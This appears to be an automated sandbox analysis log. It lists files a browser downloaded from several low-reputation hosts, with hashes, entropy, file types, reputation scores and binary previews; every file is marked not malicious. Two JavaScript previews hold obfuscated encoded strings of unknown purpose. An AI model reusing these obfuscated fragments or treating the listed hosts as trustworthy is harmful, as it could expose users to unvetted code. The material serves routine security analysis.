                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A9B4901FA6D711E99C60DD743CA228EB" xmpMM:DocumentID="xmp.did:A9B49020A6D711E99C60DD743CA228EB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A9B4901DA6D711E99C60DD743CA228EB" stRef:documentID="xmp.did:A9B4901EA6D711E99C60DD743CA228EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...1...NIDATx.b...g..`b....Fs.3..H^Yi.c.....1Z...kiQ...Eo...Hx..>......_.....ru{cAd.P..G/.^...|..Uy..M4.0.<.._..u...r
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 76 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8108
                                                                                                                                                          Entropy (8bit):7.964035215065756
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:DIA7ubIPCuNn1X7eIPHppVirnGkmWMZLz/eb2jL90/:UzbIqurX7zPHppAS4Ev02ji
                                                                                                                                                          MD5:4A5E16C92C99A6CB8EE738883B918E28
                                                                                                                                                          SHA1:5EFFC04119FC90D41E40CE8C4DA43CA8D78E62D7
                                                                                                                                                          SHA-256:47AD5B6C7F6884A042B21E4E80D7B74A4ABDA097B5F785D5A2A460DB7DA1B3B9
                                                                                                                                                          SHA-512:BABC4652798CA5293E4D1B9F2282A4AC9FDC6E58AF4410E255CA7A62D80C094F19EA6AB6B57551FEEB72416091E97DEB725FB04559644E891E1D6F5CA6BEC842
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/service/security_icon1.png
                                                                                                                                                          Preview:.PNG........IHDR...L...H.....\..=....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx..y.eWU.k.}...{..^Ue`P .@.2......... !!@.$@.ZZZ0..G..LI..d.@... B#m.".A..D..$.J..w8g...}...z..T......g....k..t.;0.P..fx.C..=<.#.[80....>V|.....N...j@..8....G.A.a.$W...qZ"..9%..&.RJ...#?....]4}.;........ ..%.S...$...f....p...A.'....?}}....x....sxut....%..7.......'1...(&........0@%..Hr...P..g.....?.W..x.F..w..I(&..S....&........._+z.=Z\..ND.:x0GO.1.DA.i.L.fY..W.H.8.1.^g!..PQ..H.S...(.....z...[.....V.|_.l.z.............N...^..G.eT.....F.:......G....d.a....$/V.j..Pj....m............g...o X+%:.Q.m.w.a...d<.C.....g....^...xn1^...*%q. "...1.B@bBf..V...;m.f.05...,......U.?.Q..iQ....z.O\.....sH...|&.v...2.....E..P.1.e.nU...S..q.7.Vy3.eit@.P...f....p..Y....x..i.....r.......GEq.8..\(Mx8..9.1+..]GA..Y.c.~.(p....K.>O=.8.4..2.ZC.`G.>.........[...Eg4l0usu..........D...!..g....R..W]..F.M^.i2f...@*.".....f.>~.;..,D-...0. *D...@..j.Mz.5;.pxtl
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1192), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1192
                                                                                                                                                          Entropy (8bit):5.801319581928282
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Vt5xoPzgtoOZjY7CrOQoefKheP3Xr1zbOK0BTa/e0bZXXg5:VnxOuZ3OQLfB5bOptalbZXQ5
                                                                                                                                                          MD5:A703F6C44085561B76B776E26EEE1E08
                                                                                                                                                          SHA1:F4568D70239EF79C48C42F9BB95A2BE4DB93D2AF
                                                                                                                                                          SHA-256:BBBD81C990C4B537420581C81014BE401683582BBAF3F8E9934FB260665D3238
                                                                                                                                                          SHA-512:DF10350B98C100371CACEA818991375881C3916D354D8017C8810B1A55BD0A8D84B29E37AD5B77B10B6A9F7F7ABDF111E45A6BBA4EBEA2169CE331C6D41A85A9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/footerImg.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnADgFYBdAGgG8AFAdgFsAmALgDMBXNGAFwEt1MpSnUkgCU5AESskIAARJOAJ25dxAbgDyYAFYguAOgAmIZtzQhKClBBALOAT0xDxAfWcgkAWRQHWAGxDiFABuUL6sIIwAhAAMAL4iqiEKMmgAvEiY4tEwEMziIqQgqeQGUJxQLOxcvGiYYgognKwKaORICjCM4oEwBmiUZQAWjGiGxlB+nHoAwujyUGhTvWgAEijypNy0UADmIACqAEoAMl0A9Fu7IAC0EDDisbGkMCi0EKycIAaM5E8wDWUvpUODw+GIkjIoKlOINuEhBKlgKYDChgHoAMoAaQAkgA5VQZcQARgAglodvlMnozuIANScWniC5oIwADz0WiQ+T0MJAtTYIJqjnBUGSSGhemYKBQnwUei2O1UUD0ABIzKzOAAVZRwTAC6pg8jK9owdLxc1PbjFBosmzAg21MQwuGq/4gQEAUX8tD5nFUzqQemc0l8zCDMFUDSaLRkAaDtEw0RET3mPBghz5RgUADE0EhGNh9aDHeQIVCAwjlSq3Z7vb7hKllcGQKHwwAfNt+qPNNByTIGbhBQJtcpp6a+KBIfPiKUymy3UWcMwKB6kbCEgdDiip5TjyfTl6LKCmGyr9eZPzDncwPdTrrQWzL66+OGcM+El+Bc/iKBX0e7ic73EB8lxsGQwDAUx30yJBoDQfJiBERDSCbIJMhkfJhEyT810JX9t3/G9AOnEDl0hCknm/WCFgQpCClQ9DMI/bgvzwv8ygA/d70XMiUAo3CYLg2jkIY8QMIKZjWMyfCRw4oiuOAniwIwaDxGo+C6JEoM0LEpjsJYgSf3YsdiO4x8wNofiqKEzT6O0xiJP0qSjIIuTbxIpTkggN9KMJdThLs5wdPErDxBw78ZOvdyzNA5JQlU/zbJQ+zdMcsKDIi4zOKA0iwKQMAEpsxCtKChzQvCtjXJMhTcuSWhBk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):47037
                                                                                                                                                          Entropy (8bit):7.99157199179088
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:kFQH/rqRUJ8FxcRtKkW0eDF+9LgrSQI7rqzCEq2KdCBy2G+uAmR9RS2ISyjd3zB+:kFQHuRUKFyRtKk9S+YSKWEKIBNbk0jtQ
                                                                                                                                                          MD5:24310561B355C9CD5DF37EA16D6DFD48
                                                                                                                                                          SHA1:23DA99C2E6C9CE818B229F370463DD1F83259D35
                                                                                                                                                          SHA-256:9E88CC67EA4F1EAC829922B9FBDE3239EEFB7242581FA0DB69589F0ED403EFB0
                                                                                                                                                          SHA-512:2989186D05D4B700FA4ACE4FB4CF7CBAEAF4551044A8B2A13FD54C41E8EC46534F6A7208691AC5CF12D0FC0A5EA452A3D338EE2F63E887AAE77AF37F689B1CA8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:4B70E39BCDEB11E9AE98C341B6C88BB3" xmpMM:DocumentID="xmp.did:4B70E39CCDEB11E9AE98C341B6C88BB3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B70E399CDEB11E9AE98C341B6C88BB3" stRef:documentID="xmp.did:4B70E39ACDEB11E9AE98C341B6C88BB3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......-IDATx......?^.&...w..Y $D......6`..g.|.....>..|.}g..`l..6.$....HH(gm.qr......E..0..%........t......k.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (801)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):32727
                                                                                                                                                          Entropy (8bit):4.513607653838289
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:boqBveMjZ1oE/eL8hhMjm9a1hI4vhej4pZ:Bpo5GhMjm9a1hI4vheUpZ
                                                                                                                                                          MD5:30BE40425B37BEE4158676082CEF1F4D
                                                                                                                                                          SHA1:B41ED46721936872D5D7EADF303CE22938240D2A
                                                                                                                                                          SHA-256:F5CA5F543161A6B37CA2BF26C4F3C630FE08323108C77DAC1FBA6CE755CE6F47
                                                                                                                                                          SHA-512:BC704676C0863DABB3AB6D84D0DAF70E4CB29890E91FC7EE7BE8F52A29154FC9B16E2862F91B55321C85B85F83D6F53A52A69D2DC60935A561656686D1755FF3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/static/js/gb.validation.min.js?v=1717580749344
                                                                                                                                                          Preview:(function (c, m, r, t) {. var o = function (t, i) {. this.$element = t, this.defaults = {. type: 1,. mode: "fixed",. vOffset: 5,. vSpace: 5,. explain: "........",. tipSuccess: "....",. tipFail: "....",. tipFail: "....",. refreshTip: "....",. zoomRatio: 0.5,. imgSize: {width: "290px", height: "180px"},. blockSize: {width: "40px", height: "40px"},. barSize: {width: "290px", height: "180px"},. circleRadius: "0px",. yHeight: 150,. backImg: "",. sliderImg: "",. randomKey: "",. ready: function () {. },. checkCode: function () {. },. success: function () {. },. error: function () {. }. }, this.options = c.extend({}, this.defaults, i). };. o.p
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1121
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):738
                                                                                                                                                          Entropy (8bit):7.707454184987905
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XS9KUXkL2ET5cyu+LqorDxXyUhaUp9JBCB9pFEfXj9cmnd905hIR7+PVk6q5pvZ:XS9GLv5pPHAUkU7CTpax3dQGYIfR
                                                                                                                                                          MD5:7A854A6E7C04018B5F9C32442DA6A9ED
                                                                                                                                                          SHA1:4831131C7B8C60F08CCEE625E3B267A20F7ED6F9
                                                                                                                                                          SHA-256:6AA11D5906FF4C7D100F0F95BA7166D5EBE53C4B54C8E33D819642B36286C859
                                                                                                                                                          SHA-512:E66C25933C0D8526ADA0A3C1315E49003A2BC0B6992FC3784BDD1C0D5E1C0005F1833E98DEBAA1890FEF46A3F9AA6B62D8297725D53E50E06AC1A4C3E124EBB4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=xpj723.cc&terminal=1&r=381975328
                                                                                                                                                          Preview:..........\.Mo.0...|.(..R.K.[.....1..;.4!.qRw..lg]Y{D.MB.2......"$..4k..O..tX........?91.Gl.)VM...n...cM./"..X....2.e.,C...c...`...Cc![f.VL...(......8Q.".a...!..,...:6..i..H..q..^eLHt.....m..@...l6R....2!...".V.{.....E%SI..u..4....'..XDN.......{jI...I8.6xkS......I.....T.S.>8-pf.e...4......h=h..r<.,..k.)...u.W...v}......2B..jm...i......A...Y.....R...`........z.o........S.sXq......T*.....\....'.Y..c.I.L. ........`.....:..f.L&B...\.'...........+v.8.Rg.E9.S...Rl.P.p(.X...^...z~6..f........[..g..f.....%.b.]....q/.....Mq.@.h...]...?I....F.DB..A.rs.!....='..$qZ?N.Sv.+n-....J.\.....P....!m.Yv......??...}xj.=..... 7}%).V..^m..W+.]{...(..a........d.c..t..bz.i8..../ ...X...BF(..$a..........K...a...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 108 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2133
                                                                                                                                                          Entropy (8bit):7.490090340114487
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:ZANn2N2D2iJ3urQrXv/gCSK57IsJPkI6Hhs/A:a2ojgCnlN6HOo
                                                                                                                                                          MD5:2785D329B3A6D8E6A82A6D8E8AB23351
                                                                                                                                                          SHA1:3B4898A16C174097742C086BCD616B4AC1833D19
                                                                                                                                                          SHA-256:01EB9FAEC1E6A393A5F29F516BC371A5BBFA620238A54802BA46FB4C571717B6
                                                                                                                                                          SHA-512:3C240234D574FD8A9C6072DE260FD7D2336CC4AF2C61F6E8B47477C331382F58E58D829FFA7B8A02BB524CD1EF8905D8A8593A27373CDF58B3AFA1F958B8E431
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/news_icon.png
                                                                                                                                                          Preview:.PNG........IHDR...l..........N;|....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:AD630BE350A211E79D04F4DB96458C26" xmpMM:DocumentID="xmp.did:AD630BE450A211E79D04F4DB96458C26"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AD630BE150A211E79D04F4DB96458C26" stRef:documentID="xmp.did:AD630BE250A211E79D04F4DB96458C26"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx.b...b@.......TkL.W..x...... 1FF...@5.P6.....0....FAp.A..?$*@ ..Q.Qj.....c.........0....`......`...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):31140
                                                                                                                                                          Entropy (8bit):7.9885125318058625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:Fn3z4wyH1Lg4+yPAcybUYBf1T+09KXhF6FeSgsK0HjXJD:9jryHhOsAcybUYBtT2RFWg10zJD
                                                                                                                                                          MD5:87BD274EE075D497D177232AFB7B3EEE
                                                                                                                                                          SHA1:E6B36A4CE9B2FFB60D97A4BB31DF520987A0C675
                                                                                                                                                          SHA-256:4679E5FE6CBC8D279B01A15DAED7D8FAF25CC395A79B4D255BB946D113DA6475
                                                                                                                                                          SHA-512:D1267C76CA29F1272DA2D9F46B760BB70AD0CB85884EEAE7144E45B88B050867756C3122B527476250853B9F16491717752E95F9ADCE2C3DB19A77D2034E40B4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/fish/06.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmpMM:InstanceID="xmp.iid:64AA320293A511EC9252A442C83F2742" xmpMM:DocumentID="xmp.did:64AA320393A511EC9252A442C83F2742"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:64AA320093A511EC9252A442C83F2742" stRef:documentID="xmp.did:64AA320193A511EC9252A442C83F2742"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...w..v.IDATx.....U.?..~...=.l*.@B...Rl.Q..Q@@.........D...(JSz....d....l..L..sf....@(.....d..;w..9..<..s.s.C.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3404), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3404
                                                                                                                                                          Entropy (8bit):5.9039898518158385
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VyDBHaahlGp5g+jbU60cgrAj6OlrJAy/j0nnQFNvO:VylHJ+j7LgrA2Srey/j0nQFNO
                                                                                                                                                          MD5:9248FC4313C726927FCC92BD0B7EA06C
                                                                                                                                                          SHA1:8BD667ABAF22E5BD134532F3356EE411BFA6B138
                                                                                                                                                          SHA-256:5DD4B964C3A52CA827057114431C0697FE6D8470528DF4AC5112136865869026
                                                                                                                                                          SHA-512:AD0BFE846274ED0685F40A050EFF41ED4F9F85DF29DA7CD13D6DA9A3EA24DB3336C75971D27111A161BC829FE7DD96964598D69BE3D0DBB95D3F2693749E52EB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/headerTip.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAFgGYBdAGgG80BhARgAkAuAMwFc0YAXAS3Uw9JABKcgF9SwABoBWAJ7M2nHmj4DSXYQCIWSEAAIkHAE5dOGgNwB5MACsQnAHQATEEy5oQABUMoIIQxxlMEFINAH1QkCQAWRRHFgAbEA0KADcoeJYQBgBCAAYRQTM0w30AXi5MDQARRwAOYA1BUjRy+2UkJqhyytyYCCZG0kNujQA5AE0ADwtBmFLMZUFMUVIrW05MQ3sAWygIAHEQDg4/DpwNJDQAZSPuNABzZI0uJAAZFHu3DWJBJsoobZZDTcCBvF4cZKOKAcKDydjcXjCQxHFiGNDkGCONAeaEACwYUCcLigCQ49io6AMUDQZMxaDoKAMam29wAqgAlV4EolMEnxMkUtBUmn2OkMgwAag0AHouLt7iAALQQGDSlAcXF+aUaCXANyOFDAexXADSAElRlLtaQQWCDAwVtxAYYGGgEvFSKyrgBRJ1A5Jy+4AISgOgY2A08Wp91CEAAXk8mFHHmQYCg2CcXblSGmM34ACpyvyu90CNBQMCJdkgT4GYt5ERiQEa2JIB2BnEauGKXj8ITkZEcVFoDS444QDSlKdkpAsMAGQyYbP4QQAfg4DA1L1FWM7uKtcqgCuVqp1W6Q9kDIZ02BAxCtZ7EOg4FLzLtY8KUKn7xV0XFKUR4vYSYoCgi74DQABUgEavYhjUga2yYL8EqKgATLkZjnqK6Y0n4pTYbmeGGBKXA2ri25EZmAB8HAAGR0XwFEXlR+EcE0hG4ZmAA8IAMUxlFcfhQhiMitaZoKRgoPEiTvgoCLKOx5BcEwfD2DChgKrSUZIHatLoDCbhIJUR4gDSipieCfiNIIg7Dro2FmRWVY1lZhirikKBcI4DnMfYAAk3gsJm9gQNouKVNKjgwKu3mlFAhiNNyzi8qS9istw8T2OkfgcAA6glaBuPclSAMr6gCySoA+UqAL8BgBU5
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 117593
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19781
                                                                                                                                                          Entropy (8bit):7.986827144174585
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:PBqPbUdME44urQNY2Pj9gtCYOAfzgSC815eXnAaV3PN5gRs8AX1g760jGFw:PMFueKYggtCYOhSC815eF3sR0Xm71GFw
                                                                                                                                                          MD5:7FAFDD760D3210BDA0AE7F9C497FAF0F
                                                                                                                                                          SHA1:3BEB331144D7B7CD2C7E629C3EF651FED52162E6
                                                                                                                                                          SHA-256:27CC1F1823385E7E53EB937A54DA16C295976072B107A450E6111F435D77CCB1
                                                                                                                                                          SHA-512:9E1F0F70B319F64969BDBEF0BABA70B00C1AEA695F26ADF2BC87F44C11B18AD72E73C95CAEA101D6234DE35DC0BD15C5E8EB6E31F233914200986768F6F83FC7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/themes/default/bootstrap/bootstrap.css
                                                                                                                                                          Preview:...........}k......rOLL....W.*..{.]G..e..".s..H..D...1:.o?..H$HJ]c.".}.)..D"3.L$......F..GU.M[....Y4....==~...].m..;.......^..(........O.........m......&.F.c..?..O.i.......>..6....MYm>...........w............/y.m.Nh.%..#0.../.:*..........d.....c...I....i.)..\..6..N..?I.....q...>M..]s.T..!._..c|M...8m.,.gy..e3../......y.....h.....K].O.CZ...x....&........dEs*./..1...9+..6=~L..^.i..Y...,.eq.'............&mr^+.=....[..*.......?.s.b6...E....m~`.m..]..&....r.&...G&.csJ...^....#c..b.\.s.I.l.l...-....f<.l........Q....f.4.:.H.~.Dm.2.f..,l./e.X.l...~...-W.a.?I.&..$?\Y...I.7q.?Y......k..F..h.........T5...c.3>.A...O..oA.sLmuz.D.F..}Q..D./)./...G...!.......>=J.\.b..O.x....u__..Z.7.gNiq|y."g..EL._But...z4...n+..?o2....I.'g...c..a..._.q......p.....W.V.../6..|.2]J.|.......n..,./6!8R....%.c...R.+..1......[...1.D..~9.?...o~..B.e.2&.C../......m.(.<m.u..?U..l....M.....;7...(.w.lU..G!.].=7..xdk.h._Ni.qq2...&@/Pu..y.......L.x.)[F.(.......K
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, baseline, precision 8, 659x544, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):75656
                                                                                                                                                          Entropy (8bit):7.973251684846932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:aFt/QuDmbbvL7nMJ2DFOH9+8MFYPy2cKLnruYN1hM173nJ/s+YXxnFSj/dzvQ:uQs2DswFI9hfcIiYK5nObXLSLFvQ
                                                                                                                                                          MD5:B8D7A960A4B6C034F047FF01DD4D9C43
                                                                                                                                                          SHA1:59196BB3341EA91A5A55270224A76FDC20E0EA54
                                                                                                                                                          SHA-256:9F8AFC863F5B3C95ACB8B8006DBF54857C58C904170D2F89B372F0F29887923F
                                                                                                                                                          SHA-512:6613A02E861D4EAE2B2FFDAA58E8AE493855A831CA43D33C57AA54178509A0E0E02B5B0F1032F10EB912BE450447D3295209DD805C69FB740E613EB759FD923B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/video/guide.jpg
                                                                                                                                                          Preview:.............................................................................................................................................S....Adobe.d........... ..............................................................................................!1.A.."Qa.q.2...#B..R..b...$3r...C...%cs.45T..........................!1..AQa.."q2.B..#R..34.............?..l.3.+M..~.oe.I.YO..I.......*."*<v.HvI..'...L..\....On.Hd...d..Oo.`l9(.>....,.....2%.%...$E.tV.....l.m....Z.Y#l...Sh.~PF..5v{I...4&k,..Sp..6.;W.dv.,.....q...A.F..l.6. k.......L.u..@.e.....0....C....b4t.l..;f..6........&.#....aK.4..#..W..q..X|.b.G!..wjp.'*.3d..nT^{...../&..FoJ...#s..(..Q......).bn.2TsbM..6......UI.....Tk..C..l.).......+TJ.*.4..:..%.6Q......U.lGlNx...0...j$...(M.4./#N.tBL6.s...~.....E.d.r...lY[..#..o...5....;.tr....^AW.r.%..S|..C.....dpqy..7lT....7.......S..Z=...v..............U..g%.J'..9..l..g.{E,TT.... .G....d}.....V.....\....X$|.....~.........I6.7...7.,mFR<'...>m./..{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19634
                                                                                                                                                          Entropy (8bit):7.963184945669312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:GQmYc2gqyEc+Ya0YgdNnx6g5LVW7DZ6/VUlOz0ouU0If1H9MwVlJyFR3ZqmeFliO:GQmYYqdc175dVx6gU7oZ7df1H9M5dFe3
                                                                                                                                                          MD5:1D8F3EE8FF9C810124A834D133E23195
                                                                                                                                                          SHA1:FC6D0D17A984C58E60CB1E7490FD8C730A972197
                                                                                                                                                          SHA-256:620E1BDF3C26704F4070CEED466065CFE6AE105D64F8EA11F1E619F1980E8BC6
                                                                                                                                                          SHA-512:CB8C7FBBF43568AD0FFC76B7CBB831CAFEED921B7DC3ED80960C7524B5DFA504F50E51588602EB84A4BBBABBD0A4ABFCA9608CB7374F929E400161B6BFBC8837
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9878D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9868D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/zbw?r=6496649728
